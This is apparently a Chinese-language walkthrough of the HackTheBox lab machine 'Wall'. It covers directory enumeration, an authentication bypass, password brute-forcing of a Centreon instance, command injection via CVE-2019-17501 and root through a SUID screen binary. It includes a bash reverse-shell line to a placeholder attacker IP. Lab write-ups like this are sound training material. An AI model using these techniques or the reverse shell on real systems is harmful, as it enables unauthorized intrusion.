Hack the box_Wall

  • 2020 年 3 月 10 日
  • 筆記

大家好,今天給大家帶來的CTF挑戰靶機是來自hackthebox的「Wall」,hackthebox是一個非常不錯的在線實驗平台,能幫助你提升滲透測試技能和黑盒測試技能,平台上有很多靶機,從易到難,各個級別的靶機都有。本級靶機難度為簡單級別,任務是找到靶機上的user.txt和root.txt。

信息枚舉

masscan掃描開放端口

nmap探測22,80端口的服務信息,發現被過濾了

利用gobuster掃描web

->gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.157

->/.hta (Status: 403)

->/.htpasswd (Status: 403)

->/.htaccess (Status: 403)

->/index.html (Status: 200)

->/monitoring (Status: 401)

->/server-status (Status: 403)

只有monitoring有點用,不過monitoring需要認證才能登錄發現只要把訪問方式改為POST就能繞過認證進去發現這是一個centreon系統(Centreon是一個網絡,系統,應用程序監督和監視工具)登陸處有一個csrf令牌驗證,每次訪問都會更改

在官網中得知,我們訪問/api/index.php?action=authenticate,並且提供登錄登錄信息,將可以繞過令牌校驗,從而達到爆破目的

我們使用Seclist字典進行爆破密碼為 password1

我們發現了系統版本為19.04.0

低權限shell

該系統存在CVE-2019-13024漏洞,不過當我使用poc嘗試攻擊時,發現poc用不了,payload有一個過濾處響應403 後來我發現了CVE-2019-17501,這個要簡單一點在http://10.10.10.157/centreon/main.php?p=60807&o=a&type=4中寫入bash並用SimpleHTTPServer上傳自己的webshellwebshell如下

->#!/bin/bash

->bash -i >& /dev/tcp/10.10.xx.xx/xxxx 0>&1

再次寫入bash命令獲得反向連接shell

->bash /tmp/n00b.sh

並且獲得TTY終端

權限提升

在使用自動化腳本枚舉系統信息中發現系統中有一個不常見的suid二進制文件:

/bin/screen-4.5.0

使用poc獲得root權限

最後我們得到了user.txt、root.txt

手握日月摘星辰,安全路上永不止步。

– Khan攻防安全實驗室